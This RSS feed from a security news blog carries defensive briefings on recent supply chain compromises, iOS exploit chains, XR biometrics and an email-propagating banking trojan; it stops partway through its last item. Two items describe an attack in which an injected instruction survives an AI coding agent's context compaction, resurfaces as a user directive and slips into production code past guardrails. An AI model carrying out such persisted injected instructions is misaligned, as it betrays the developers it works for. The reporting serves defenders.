<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
    <title>Triage Security Blog</title>
    <description>Latest news, insights, and updates from Triage Security.</description>
    <link>https://security.shortwaves.live/blog</link>
    <atom:link href="https://security.shortwaves.live/blog/rss.xml" rel="self" type="application/rss+xml" />
    <language>en-us</language>
    <lastBuildDate>Sun, 05 Apr 2026 17:20:05 GMT</lastBuildDate>
    
    <item>
        <title>Navigating Recent Supply Chain Incidents and Mobile OS Patching Shifts</title>
        <link>https://security.shortwaves.live/blog/3f5ea2a1-9e89-479b-babc-59e1ea30952b</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/3f5ea2a1-9e89-479b-babc-59e1ea30952b</guid>
        <pubDate>Sat, 04 Apr 2026 03:13:29 GMT</pubDate>
        <description>Recent security incidents involving modified open-source development tools and new mobile OS vulnerabilities require immediate attention from security teams. This briefing details the technical findings and provides actionable remediation steps to protect CI/CD pipelines and enterprise mobile fleets.</description>
        <content:encoded><![CDATA[
            The security community is currently navigating a dense cluster of software supply chain incidents and a rare shift in mobile OS patching strategy, both of which show how rapidly the window for defensive response is closing. For security teams, the most immediate development is Apple’s decision to backport critical patches for the DarkSword vulnerability sequence to iOS 18. This move, finalized on April 1, is designed to protect organizations that utilize "n-minus-one" patching policies, strategies that typically favor stability by staying one major version behind the current release. While Apple usually limits security updates for older operating systems to hardware that cannot support the newest software, the public leak of DarkSword’s methodology on GitHub on March 22 forced a change in posture. The availability of these tools to unauthorized parties means that remaining on a previous OS version introduces elevated risk for enterprise fleets.

The broader situation today is dominated by the expanding fallout from TeamPCP’s supply chain campaign. Within the last 48 hours, both the AI startup Mercor and the European Commission (EC) have disclosed significant security incidents tied to modified open-source tools. These events demonstrate a highly compressed intrusion timeline; in the case of the EC, threat actors obtained an AWS API key on March 19, the exact same day TeamPCP began distributing a modified version of the Trivy code-scanning tool. This indicates that the response window for supply chain incidents has shrunk from days to hours. Furthermore, the situation has been complicated by a convergence of threat actors. While TeamPCP initiated the intrusions, secondary groups like ShinyHunters and Lapsus$ are now claiming to possess massive datasets (91 GB from the EC and 4 TB from Mercor), suggesting that once initial access occurs, multiple threat groups may move in simultaneously to monetize the exposure.

## Technical capabilities of mobile and cloud threats

Technically, the DarkSword and Coruna frameworks represent a significant escalation in mobile surveillance capabilities. Coruna is a sophisticated, multi-sequence framework comprising 23 vulnerabilities that allows threat actors to establish command-and-control over SMS. This effectively turns an iPhone into a self-propagating platform for harvesting contacts and distributing unsafe links. DarkSword presents unique detection challenges. Unlike Coruna, it does not root the device. Instead, it inherits the privileges of legitimate processes and escalates just enough to reach processors with Ring 0 access. This stealthy approach (T1068) makes it nearly invisible to traditional root detection mechanisms. Defenders should be aware that while Apple’s updates mitigate these specific risks, the market for "n-day" iOS frameworks is expanding, and criminal campaigns have already been observed spoofing organizations like the Atlantic Council to deliver these unauthorized components.

In the cloud and development space, the methodology used by TeamPCP reveals a systemic weakness in CI/CD pipelines (T1195.002). After gaining initial access through modified packages like Trivy or the Axios JavaScript library, actors consistently use the TruffleHog tool to hunt for unsecured credentials (T1552) within AWS, Azure, and SaaS environments. This has led to the extraction of sensitive data including S3 buckets and container instances. The risk is being amplified by the rapid integration of generative AI into development workflows. Data from the 2026 Open Source Security and Risk Analysis (OSSRA) report shows that AI-driven development has contributed to a 74% year-over-year increase in codebase size, while the mean number of vulnerabilities per codebase has surged by 107%. Many of these findings trace back to "zombie components"—outdated libraries that have seen no development activity for years but remain embedded in critical infrastructure.
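To make the credential-hunting step concrete: scanners in the TruffleHog family work largely by pattern-matching known key formats (combined with entropy analysis and live verification) across repositories and build artifacts. The following is a minimal illustrative sketch of that idea, not TruffleHog's actual implementation, matching only the documented AWS access key ID format:

```python
import re

# AWS access key IDs are 20 uppercase alphanumerics beginning with a known
# prefix such as AKIA (long-term) or ASIA (temporary STS credentials).
# Real scanners combine hundreds of such detectors with entropy checks.
AWS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")

def find_candidate_keys(text: str) -> list[str]:
    """Return substrings that match the AWS access key ID format."""
    return [m.group(0) for m in AWS_KEY_ID.finditer(text)]
```

Running something like this over a cloned repository surfaces the same low-hanging secrets an intruder's first pass finds, which is exactly why such keys must never reach version control in the first place.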

The recent accidental publication of a source map for Anthropic’s Claude Code tool further illustrates the fragility of the modern developer workstation. By exposing over half a million lines of TypeScript, the leak provided a roadmap for researchers and threat actors to understand the internal context pipelines and sandbox boundaries of AI coding agents. For defenders, the primary concern is that a compromised AI agent, which maintains persistent access to the shell and network, could allow an unauthorized instruction to survive "context compaction" and eventually flow into production code. This introduces a new class of persistence that bypasses standard output guardrails.

## Remediation and continuous authentication

For security teams, the priority is an immediate audit of CI/CD runners and the rotation of all cloud credentials that may have been exposed to affected tools like Trivy, KICS, or LiteLLM. Simply removing a modified package is insufficient; if an API key was harvested, the unauthorized party likely already has a foothold in adjacent environments. Organizations should also reassess their "n-minus-one" policies for mobile devices. While these policies are intended to ensure uptime, the DarkSword incident proves that threat actors can leverage the gap between OS releases faster than many IT departments can react. Monitoring for anomalous activity in cloud environments, specifically unauthorized use of TruffleHog or unusual S3 bucket access, is essential.
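When planning that rotation, one defensible rule is to treat every key that existed during the exposure window as harvested. A small pure-logic sketch (the inventory format and function name are illustrative, e.g. as assembled from an IAM key listing):

```python
from datetime import datetime

def keys_to_rotate(keys: list[dict], exposure_end: datetime) -> list[str]:
    """Select access keys that existed during a suspected exposure window.

    `keys` holds entries like {"id": "...", "created": datetime}, a
    hypothetical format built from a cloud IAM key inventory. Any key
    created before the window closed may have been harvested, so it is
    queued for rotation; err toward reissuing too much rather than too little.
    """
    return sorted(k["id"] for k in keys if k["created"] < exposure_end)
```

The point of encoding the rule is repeatability: during an incident, an explicit selection criterion beats ad hoc judgment calls about which keys "probably weren't" exposed.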

Looking forward, the shift toward continuous biometric authentication may offer a way to secure these high-trust environments. Researchers at Rutgers University have developed "VitalID," a software-based approach for XR headsets that uses motion sensors to analyze skull vibration harmonics generated by a user’s heartbeat and breathing. This provides a passive, continuous authentication signal that ensures the authorized user is still the one wearing the device, preventing session hijacking in spatial computing environments. While still in the research and SDK phase, such technologies represent a necessary move away from initial access checks toward a model of constant verification.

At this stage, several aspects of the TeamPCP campaign remain uncertain, including the true extent of the data removed from Mercor and whether the overlap between TeamPCP and extortion groups like Lapsus$ represents a formal partnership or parallel competitive activity. Security teams should operate under the assumption that any secret exposed to a compromised development tool is fully compromised, and prioritize total credential re-issuance.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Recent supply chain incidents reveal systemic risks in CI/CD and AI development pipelines</title>
        <link>https://security.shortwaves.live/blog/4ae04b45-a246-4c47-a0dd-b28403d1a0c9</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/4ae04b45-a246-4c47-a0dd-b28403d1a0c9</guid>
        <pubDate>Sat, 04 Apr 2026 03:13:28 GMT</pubDate>
        <description>A cluster of software supply chain events involving major open-source projects and AI coding assistants demonstrates the vulnerabilities inherent in modern development environments. By analyzing these incidents alongside recent open-source risk data, security teams can implement structural safeguards to protect continuous integration pipelines and credential-rich developer workstations.</description>
        <content:encoded><![CDATA[
            A sequence of security incidents affecting widely used software projects within a 10-day period points to a growing requirement for systemic oversight in software supply chains. Events involving the Trivy security scanner, the Axios JavaScript package, Checkmarx's KICS static-code analyzer, the LiteLLM Python library, and the accidental publication of Anthropic's Claude Code source map all demonstrate how development pipelines have become primary surfaces for risk.

These incidents stemmed from varying root causes but shared similar outcomes. Unauthorized parties leveraged a misconfigured GitHub Action in Trivy to capture credentials and push unauthorized code. For Axios, the compromise of a lead maintainer's account resulted in unsafe modifications landing in development environments. Checkmarx acknowledged a similar issue affecting its open-source KICS static-analysis tool via GitHub Actions, prompting the company to advise developers to revoke and rotate secrets and to review their deployment pipelines for suspicious indicators.

In the same period, human error led to the accidental publication of a 59.8MB source map for Anthropic's Claude Code npm package. The file exposed over half a million lines of TypeScript source code. Anthropic responded by issuing copyright violation notices to 96 explicit mirrors on GitHub. During this process, an initial network-wide takedown temporarily affected 8,100 legitimate forks of Anthropic’s public repositories, which the company subsequently corrected.

Jun Zhou, full stack engineer at Straiker, an agentic AI security firm, notes that developer environments are particularly sensitive targets. "Developer workstations are credential-rich, high-trust, low-visibility zones, and AI coding agents operating inside them are amplifying the exposure," Zhou says. The analysis of the Anthropic incident showed that while Claude Code utilized more than 25 bash security validators in its runtime, the publication process lacked a basic content check to prevent the source map from reaching a public registry.

Rami McCarthy, a principal security researcher at Wiz, observes that these events represent common ecosystem weaknesses rather than isolated zero-day vulnerabilities. "We've built a global software infrastructure that relies heavily on the volunteer efforts of open source maintainers, which creates an incredibly uneven security surface," McCarthy says. When unauthorized parties target transitive dependencies, the downstream impact requires complex, ecosystem-wide coordination. The Axios package alone has more than 70,000 direct dependencies, giving any unauthorized modification a substantial scope of impact.

The reality of modern development requires treating the supply chain as critical infrastructure. Security teams are encouraged to build guardrails into continuous integration and continuous deployment (CI/CD) environments, assume dependencies are untrusted by default, and implement ecosystem-wide detection for abnormal package behavior.
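One structural guardrail worth spelling out is digest pinning: if every dependency's expected hash is recorded in a lockfile at the time it is vetted, a silently modified release of that same version fails closed at install time rather than landing in the build. A minimal sketch of the verification step:

```python
import hashlib

def verify_artifact(data: bytes, pinned_sha256: str) -> bool:
    """Check a downloaded package against its pinned digest.

    With a digest recorded when the dependency was originally vetted,
    a later tampered release of the same version fails this comparison
    instead of silently entering the pipeline.
    """
    return hashlib.sha256(data).hexdigest() == pinned_sha256
```

This is the mechanism that pip's hash-checking mode (`--require-hashes`) and npm's lockfile `integrity` field enforce; the design choice is to fail closed rather than extend trust to the registry.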

The widespread adoption of generative AI has accelerated software creation, which in turn introduces new complexities to supply chain management. According to Black Duck’s 2026 Open Source Security and Risk Analysis (OSSRA) report, which analyzed 947 commercial codebases across 17 industries, the integration of AI tools correlates with a 74% year-over-year increase in the mean number of files per codebase, and a 30% increase in open-source components.

The OSSRA data shows that 65% of organizations experienced a software supply chain incident in the past 12 months. Concurrently, the mean number of open-source vulnerabilities per codebase rose by 107% to an average of 581. The audit found that 87% of codebases contained at least one vulnerability, with 78% housing high-risk issues and 44% containing critical-risk findings. Additionally, 68% of codebases contained open-source license conflicts.

Tim Mackey, head of software supply chain risk strategy at Black Duck, cautions that development teams often interpret vulnerability management as simply updating every component to the newest release. However, the data indicates that older versions sometimes offer a more stable balance of patched code and fewer known issues—with the third-most recent version frequently being the most secure on average.

"Immediate patching seems reasonable, but in reality teams need to perform a risk-based analysis of their dev processes," Mackey says, noting that the residual effects of compromised container images can persist over time. The Black Duck report also identified a pervasive "zombie component" issue: 93% of codebases contained components with no development activity in the past two years, 92% contained components four or more years out of date, and only 7% utilized the latest versions.

The public availability of Claude Code's architecture provides a clear view into how AI workflows operate; these workflows often move faster than the security practices designed to monitor them. Jesus Ramon, an AI red team member at Straiker, explains that the exposed code reveals the context pipeline, sandbox boundaries, and permission validators. This visibility allows researchers to understand how cooperative AI models manage data.

Traditional unauthorized packages operate within a bounded runtime. However, an AI coding agent generally maintains access to the file system, shell, network, and Model Context Protocol (MCP) servers. Ramon notes that this introduces a new class of persistence: a manipulated instruction can survive "context compaction"—the process by which the model summarizes and compresses older session data—and re-emerge as a legitimate user directive. From there, it can flow naturally into pull requests and production code without triggering standard output guardrails.
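The compaction-survival risk can be illustrated with a deliberately naive toy: a summarizer that preserves anything phrased as a standing instruction will carry an injected directive across every compaction cycle. All names here are hypothetical, and real agents compact context with a model rather than a filter, but the failure mode is analogous:

```python
def compact(history: list[str], keep: int = 3) -> list[str]:
    """Toy context compaction: retain standing directives plus the most
    recent `keep` messages, discarding older conversation.

    Because anything phrased as a directive survives every pass, an
    injected instruction persists indefinitely and can later re-emerge
    as an apparently legitimate user preference.
    """
    directives = [m for m in history if m.startswith("DIRECTIVE:")]
    recent = [m for m in history[-keep:] if not m.startswith("DIRECTIVE:")]
    return directives + recent
```

After any number of compaction rounds, the injected line is still in context, downstream of where output guardrails inspect generated code.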

To protect these evolving environments, organizations should focus on restricting access to sensitive CI/CD credentials and implementing rigorous secret-management practices. Security teams can improve resilience by validating dependencies early, limiting session lengths for AI agents to reduce the compaction window, and vetting MCP servers with the same scrutiny applied to standard npm dependencies.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating skull vibration harmonics for continuous XR authentication</title>
        <link>https://security.shortwaves.live/blog/e8441b1b-735f-4898-8eb3-2aae512ab181</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/e8441b1b-735f-4898-8eb3-2aae512ab181</guid>
        <pubDate>Sat, 04 Apr 2026 03:13:27 GMT</pubDate>
        <description>Researchers at Rutgers University have developed a methodology for continuous biometric authentication in extended reality (XR) headsets using vital-sign harmonics. This approach offers a passive mechanism to verify user identity and maintain secure session states in enterprise immersive environments.</description>
        <content:encoded><![CDATA[
            Biometric authentication continues to evolve to protect emerging technology environments. A research team led by Rutgers University recently introduced a novel biometric authentication software designed for extended reality (XR) headsets—encompassing virtual and mixed reality hardware. The research focuses on safeguarding digital identities in immersive spaces by analyzing skull vibration harmonics generated by vital signs.

While immersive technology adoption varies in the consumer market, enterprise organizations increasingly rely on XR hardware. Aerospace firms use it for 3D training, and engineers utilize spatial mapping for complex design work. In these environments, protecting sensitive proprietary data and intellectual property requires reliable authentication mechanisms. This research arrives as the security community advocates for stronger access controls, prioritizing passkeys, multifactor authentication (MFA), biometrics, and FIDO security keys to mitigate the risks of credential compromise and prepare for post-quantum cryptographic standards.

## The mechanics of VitalID

The technology, named VitalID, operates entirely as software. It leverages the built-in motion sensors of an XR headset to capture low-frequency mechanical vibrations in the skull produced by a user's breathing and heartbeat.

According to the research summary, these harmonics contain unique biometric signatures specific to a wearer's head and facial structure. The system extracts biometric features including the ratios among these harmonic frequencies. It then applies an adaptive filtering method to reduce motion distortion and uses attention-based deep learning models to maintain continuous user authentication throughout an XR session without requiring active user input. A patent application has been filed for VitalID, and it is positioned for licensing as a software development kit (SDK) or OS-level integration.
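The adaptive filtering and deep learning stages are beyond a short example, but the first step, measuring signal energy at candidate vital-sign frequencies and forming harmonic ratios, can be sketched with a single-bin discrete Fourier transform. This illustrates the general signal-processing idea, not VitalID's actual pipeline:

```python
import cmath
import math

def magnitude_at(samples: list[float], fs: float, freq: float) -> float:
    """Spectral magnitude of `samples` (sampled at `fs` Hz) at `freq` Hz,
    computed as a single-bin discrete Fourier transform."""
    n = len(samples)
    return abs(sum(x * cmath.exp(-2j * math.pi * freq * i / fs)
                   for i, x in enumerate(samples))) / n

def harmonic_ratio(samples: list[float], fs: float, fundamental: float) -> float:
    """Ratio of second-harmonic to fundamental magnitude, one of the
    feature families the research summary describes (illustrative only)."""
    return magnitude_at(samples, fs, 2 * fundamental) / magnitude_at(samples, fs, fundamental)
```

Fed a heartbeat-band accelerometer trace, the research summary's claim is that ratios like this are shaped by head and facial structure, making them wearer-specific rather than dependent on the heart rate itself.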

## Contextualizing continuous authentication

While VitalID addresses a specific hardware use case, it builds on previous concepts in specialized environments. For example, SkullConduct previously explored user identification via bone conduction in eyewear computing, and the Nymi Band integrates electrocardiogram (ECG) data for authentication in IT and operational technology (OT) spaces.

For most organizational devices outside of XR, established practices remain the baseline. Karolis Arbaciauskas, head of product at NordPass, notes that pairing on-device biometrics with passkeys provides a highly practical path for many organizations. This combination creates a system that is resistant to credential compromise by design, avoids shared secrets, and offers a clear migration path to post-quantum cryptography once platforms standardize it.

However, identity security experts recognize the specific protective value of the Rutgers research for immersive environments. Ralph Rodriguez, president and chief product officer at Daon, points out that the methodology provides a passive, built-in, continuous authentication signal using existing commodity sensors.

Rather than replacing core identity systems—such as account recovery, identity proofing, or strong cryptography—VitalID functions as a continuity and reauthentication mechanism. As enterprise applications, collaboration tools, and health data become accessible through XR headsets, the security requirement shifts from verifying the initial login to ensuring the trusted user remains present over time. Implementing continuous authentication helps maintain a secure session state in environments where a single front-door access check is insufficient.
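The session model this implies can be sketched simply: a session remains valid only while sufficiently confident passive verifications keep arriving within a freshness window. All names and thresholds below are hypothetical:

```python
from datetime import datetime, timedelta

class ContinuousSession:
    """Session that stays valid only while passive biometric match
    signals keep arriving. Names and thresholds are illustrative."""

    def __init__(self, freshness: timedelta, threshold: float = 0.8):
        self.freshness = freshness      # max age of the last confirmation
        self.threshold = threshold      # minimum acceptable match score
        self.last_confirmed: datetime | None = None

    def record_signal(self, score: float, at: datetime) -> None:
        # Only a sufficiently confident match counts as a confirmation;
        # weak or failed matches simply let the session age out.
        if score >= self.threshold:
            self.last_confirmed = at

    def is_active(self, now: datetime) -> bool:
        # Valid only if a confirmation arrived within the freshness window.
        return (self.last_confirmed is not None
                and now - self.last_confirmed <= self.freshness)
```

If the headset is removed or handed to another wearer, match scores drop, confirmations stop, and the session lapses without any explicit logout, which is the session-hijacking protection the research targets.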
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Scope of TeamPCP supply chain compromises expands alongside overlapping threat activity</title>
        <link>https://security.shortwaves.live/blog/ef53161c-cb3e-4569-b21a-e6e2648fa9c9</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/ef53161c-cb3e-4569-b21a-e6e2648fa9c9</guid>
        <pubDate>Sat, 04 Apr 2026 03:13:27 GMT</pubDate>
        <description>Following recent compromises involving the LiteLLM and Trivy open-source projects, secondary threat groups are attempting to monetize the exposed data. Organizations must rapidly rotate credentials and audit CI/CD pipelines to mitigate the risk of unauthorized cloud access.</description>
        <content:encoded><![CDATA[
            The impact of TeamPCP's recent supply chain compromises continues to expand across the enterprise field. Following earlier reports of unauthorized code introduced into open-source projects, two affected organizations disclosed related security incidents this week.

On Tuesday, the AI startup Mercor stated on the social media platform X that it was among the companies impacted by a supply chain incident involving LiteLLM. Two days later, the EU's Computer Emergency Response Team (CERT-EU) disclosed that a recent unauthorized access event affecting the European Commission's cloud and web infrastructure stemmed from the previously documented Trivy software supply chain compromise, which is also attributed to TeamPCP. According to CERT-EU, the EC inadvertently installed a modified version of the Trivy code-scanning tool. This installation enabled threat actors to harvest credentials and ultimately access the organization's Amazon Web Services (AWS) environment.

The involvement of third-party extortion groups has complicated the incident response process. CERT-EU confirmed that the cybercriminal group ShinyHunters published an exfiltrated dataset on its leak site, claiming to possess over 91 GB of sensitive EC data, including emails, databases, and confidential documents. Similarly, Lapsus$—a group associated with ShinyHunters and the Scattered Spider collective—claimed to hold 4 TB of Mercor's internal data, including nearly a terabyte of the company's source code. Mercor did not confirm this claim at press time.

It remains unclear exactly how these secondary groups acquired the overlapping data, but security professionals emphasize that organizations must address these converging risks promptly.

## Cloud access methodology and credential harvesting

Disclosures from Mercor and the EC align with technical observations that TeamPCP is actively utilizing stolen credentials to access enterprise cloud infrastructure. Wiz noted that its customer incident response team (CIRT) has observed and responded to multiple incidents where TeamPCP actors used harvested secrets to access victims' AWS, Azure, and software-as-a-service (SaaS) environments.

Wiz researchers detailed how threat actors used the TruffleHog open-source tool to discover and validate exposed credentials within AWS environments. Following initial reconnaissance, the actors accessed resources such as S3 buckets and Amazon Elastic Container Service (ECS) instances to exfiltrate data.

CERT-EU outlined a nearly identical sequence in the European Commission incident. After the modified version of Trivy was deployed, unauthorized actors extracted an AWS API key that provided control over AWS accounts. They subsequently used TruffleHog to locate additional credentials, conducted reconnaissance, and exfiltrated data.
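The monitoring side of this sequence reduces to a baseline question: which principals normally touch sensitive APIs? A simplified sketch over CloudTrail-style events (field names abbreviated and hypothetical; real detection would also weigh source IP, timing, and call volume):

```python
SENSITIVE_ACTIONS = {"GetObject", "ListBuckets", "GetSecretValue"}

def flag_anomalies(events: list[dict], known_principals: set[str]) -> list[dict]:
    """Flag sensitive API calls made by principals absent from a baseline.

    `events` are simplified CloudTrail-style records such as
    {"principal": "ci-runner", "action": "GetObject"}. A key harvested
    from a build pipeline typically surfaces as a never-before-seen
    principal suddenly reading storage and secrets.
    """
    return [e for e in events
            if e["action"] in SENSITIVE_ACTIONS
            and e["principal"] not in known_principals]
```

With the response window now measured in hours, having even a coarse baseline of this kind already in place is what makes the difference between catching the TruffleHog reconnaissance phase and discovering it from a leak site.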

The timeline of these events demonstrates a highly compressed response window. According to CERT-EU, threat actors obtained the EC's API key on March 19—the exact day TeamPCP began distributing modified versions of Trivy. This occurred a day before the Trivy compromise was publicly flagged and several days before Aqua Security, the project’s maintainer, issued a formal disclosure.

Ensar Seker, CISO at SOCRadar, notes that speed of execution is the primary takeaway. "In practice, the response window is now measured in hours, not days," Seker says. "The biggest mistake would be to remove the malicious package but leave the stolen credentials usable, because by then the attackers may already be operating inside adjacent environments."

To effectively mitigate these risks, Seker advises organizations to immediately revoke and rotate exposed secrets, invalidate all tokens, and reissue cloud credentials. Security teams should also review CI/CD runners, inspect GitHub Actions and package publishing workflows, and monitor their cloud and SaaS environments for anomalous activity.

## Convergence of threat actors and evolving risks

The situation is further complicated by the concurrent activities of Lapsus$ and ShinyHunters. According to a post on X associated with TeamPCP, the group appears to be in conflict with ShinyHunters rather than actively collaborating.

"What we are seeing looks less like a clean handoff between separate groups, and more like a convergence of cybercriminal ecosystems around the same access," Seker says. While TeamPCP initiated the supply chain compromises and credential theft, other extortion actors are now attempting to monetize the exposures. "At this stage, that does not prove formal operational alignment, but it does strongly suggest that once high-value access or stolen data emerges from a supply chain intrusion, other extortion actors can move in very quickly to amplify pressure, visibility, and potential profit," Seker notes.

Furthermore, TeamPCP has announced a partnership with Vect, a ransomware group. Tomer Peled, a security researcher at Akamai, observes that this changes the risk profile significantly. Peled notes that the collaboration could provide Vect with access to numerous affected organizations, subjecting them to potential ransomware deployment through TeamPCP's remote access trojan (RAT).

As Akamai documented recently, the modified Telnyx PyPI package contained a three-stage RAT that provides backdoor access to environments running the affected SDK. Given the volume of credentials already obtained by TeamPCP, Peled anticipates the discovery of additional compromised libraries. He assesses that the group will likely use their stolen credentials to continue installing unauthorized access tools across as many systems as possible.

Seker concludes that the involvement of additional threat groups fundamentally alters how organizations must view software supply chain risks. "The old assumption was that a software supply chain attack was mainly a downstream integrity problem," he says. "What these cases show is that it can become an immediate enterprise breach problem, where compromised packages lead to stolen secrets, cloud access, SaaS exposure, repository cloning, and then possible extortion by additional actors."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Apple backports DarkSword vulnerability patch to iOS 18</title>
        <link>https://security.shortwaves.live/blog/efb2c2da-8831-40fd-9e17-c65186b98b88</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/efb2c2da-8831-40fd-9e17-c65186b98b88</guid>
        <pubDate>Sat, 04 Apr 2026 03:13:26 GMT</pubDate>
        <description>Apple has extended its security updates for the DarkSword vulnerability chain to iOS 18 devices. This backported patch provides critical protection for organizations relying on n-minus-one patching policies, allowing teams to secure their endpoints without forcing an immediate operating system upgrade.</description>
        <content:encoded><![CDATA[
            After a brief delay, Apple has addressed the vulnerabilities associated with the DarkSword chain for all affected customers, including those who have remained on iOS 18 rather than updating to iOS 26. This release is a significant benefit for organizations managing large device fleets, particularly those enforcing n-minus-one patch management policies that require users to stay one version behind the latest release.

When researchers identify severe vulnerabilities in Apple devices, the company historically provides updates for the latest operating system (OS) and for older devices that lack the hardware to support the new software. For example, when researchers analyzed Coruna (a sophisticated vulnerability framework comprising five distinct sequences across 23 vulnerabilities in iOS versions 13 to 17.2.1), Apple distributed updates to all affected hardware, including older, un-updatable models.

However, users whose devices are capable of upgrading to the newest OS, but who remain on an older version due to corporate mandates or user experience preferences, typically fall outside this support window. For instance, many users have stayed on iOS 18 rather than adopting iOS 26 (which are consecutive major versions in this release cycle). When Apple initially addressed the DarkSword sequence in iOS 26 last year, and subsequently pushed a fix for un-updatable pre-iOS 18 devices on March 24, iOS 18 users faced a difficult choice: execute a full OS upgrade or accept the known security risk.

This posture shifted after the DarkSword methodology was published to GitHub on March 22. With the tooling publicly accessible to unauthorized parties, Apple extended the security update to iOS 18 devices on April 1, providing a necessary safeguard for these remaining users.

Justin Albrecht, principal researcher at Lookout, views the update as a positive shift for user protection. "Apple has taken multiple unprecedented steps on iOS to counter DarkSword and Coruna, to include the backported patches, alert notifications to susceptible devices and published threat guidance on Web-based [incidents]," Albrecht notes. He emphasizes that Apple's serious response should encourage organizations to prioritize applying these updates.

## The technical impact of DarkSword

Initial discussions of DarkSword were somewhat eclipsed by the public disclosure of the Coruna framework earlier the same month.

Coruna is a highly capable tool utilized by advanced threat actors, with evidence suggesting origins as a military contractor project. Rocky Cole, co-founder of iVerify, explains that the framework could establish command-and-control (C2) over SMS. A minor modification could allow it to harvest contacts and distribute messages containing malicious links, effectively creating self-propagating software. Cole identifies this as one of the most severe endpoint risks observed on the platform, prompting Apple's rapid mitigation.

DarkSword was disclosed two weeks after Coruna. While initially viewed as a secondary issue, Cole points out that its methodology is technically stealthier.

"In some ways it's more pernicious, because it didn't root the device," Cole explains. "Coruna rooted. So presumably, if you were doing root detection, you stood a chance of maybe seeing Coruna. But DarkSword doesn't root, it just inherits the privileges of the processes. It gets just enough privilege escalation to access processors that too have Ring 0 access. So in that regard, I think it's actually much harder to detect."

Cole notes that the high adoption rate of iOS 18 compared to iOS 17 (the latest version affected by Coruna), combined with the public availability of the code on GitHub prior to a backported patch, created a significant exposure window that required immediate remediation.

Prior to the leak, operators of surveillance software were already utilizing DarkSword. Following its publication, Lookout's Albrecht observed several active campaigns. "We’ve observed a handful of campaigns being conducted with the malware, to include [an] email phishing campaign conducted by TA446 which spoofed the Atlantic Council. The other campaigns observed appear to be unattributed criminal campaigns which we have been unable to link to a specific group, as well as multiple instances of apparent testing of the malware for unknown purposes."

## Managing ongoing endpoint risk

For enterprise security teams, the timeline of the DarkSword updates highlights ongoing challenges in vulnerability management. Cole notes the gap between the public exposure of the vulnerabilities on GitHub and the availability of a comprehensive patch across operating systems.

He emphasizes that corporate policies force many users to remain on older OS versions, making comprehensive backporting essential for defense. "Let's say you are a business user and your IT department says you have to use what's called an n-minus-one patching cadence, which means you can only use a version that's one version behind, what are you supposed to do in that situation?" Cole asks. "If the patches aren't being backported to all versions, how are you supposed to defend yourself? To me, this just fundamentally challenges the notion that a patching-only strategy is going to be good enough going forward."

Currently, administrators and users who apply the available Apple device updates will mitigate the risks associated with both DarkSword and Coruna. However, the broader trend requires ongoing vigilance. "What I think DarkSword and Coruna together show is that the market for n-day iOS [vulnerability frameworks] is exploding," Cole warns, noting that the cost to acquire these capabilities has fallen rapidly. While these specific sequences are now mitigated, organizations must remain prepared for similar future methodologies.

## About the author

Nate Nelson is a journalist and scriptwriter. He writes for "Darknet Diaries," a popular podcast in cybersecurity, and co-created the former Top 20 tech podcast "Malicious Life." Before his current work, he was a reporter at Threatpost.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Analyzing Organizational Resilience and Evasive Propagation in Recent Security Incidents</title>
        <link>https://security.shortwaves.live/blog/b89aa271-71e9-4883-b42b-b85a50b20e7f</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/b89aa271-71e9-4883-b42b-b85a50b20e7f</guid>
        <pubDate>Fri, 03 Apr 2026 03:05:21 GMT</pubDate>
        <description>Recent developments involving Hasbro’s incident response and the Water Saci campaign show the value of proactive business continuity and granular email monitoring. By analyzing these events, security teams can refine endpoint protections and test response strategies to safely maintain operations during network disruptions.</description>
        <content:encoded><![CDATA[
            In the last 24 hours, the security environment has been defined by two contrasting stories: one of successful organizational resilience during an active security incident, and another of a persistent malicious actor using deceptive, self-propagating scripts to bypass traditional email defenses. These developments point to a critical reality for modern security teams: while preventing initial access remains the goal, the ability to maintain operations during remediation and to detect hijacked internal communications separates a manageable incident from a broader operational disruption.

The most significant operational update comes from Hasbro, which recently disclosed an unauthorized network access incident discovered on March 28. In an 8-K filing with the Securities and Exchange Commission, the toy and game manufacturer revealed that it is currently in the midst of remediation efforts that may last several weeks. While the company has been forced to take certain systems offline to isolate the affected areas, their proactive business continuity planning allowed them to continue taking orders and shipping products. This demonstrates the measurable value of having tested response strategies in place before an event occurs.

This incident illustrates the risks facing the retail and manufacturing sectors, which manage high-value environments due to their complex supply chains and sensitive customer data. Analysts note that a multi-week recovery timeline often indicates more intensive recovery efforts, such as those following ransomware, though the company has not officially confirmed the specific nature of the unauthorized access. Regardless of the underlying cause, the ability to navigate a cyber incident without escalating into a full-scale operational crisis is a result of active pressure-testing and simulation, rather than static plans.

Concurrently, a different type of campaign is evolving across Latin America and Spain. A financially motivated group known as Water Saci, or Augmented Marauder, has expanded its reach with a multi-pronged campaign distributing the Casbaneiro banking trojan. This activity relies on self-propagating email scripts that turn affected accounts into distribution hubs. By leveraging trusted sender relationships, the group significantly increases the likelihood that their social engineering attempts will bypass security filters and deceive users.

The technical mechanics of this campaign are designed to evade standard signature-based detection. The sequence typically begins with a phishing email themed around a vague judicial summons. If a user clicks the provided link, they download a password-protected ZIP file containing an unauthorized executable. These ZIP files are often given randomized names for each recipient, creating obstacles for Secure Email Gateways (SEGs) that rely on static indicators. Once the file executes, a script known as Horabot takes control of the affected user's email account. It filters the user's contacts and sends out a new wave of phishing emails, attaching a modified, password-protected version of the initial file.

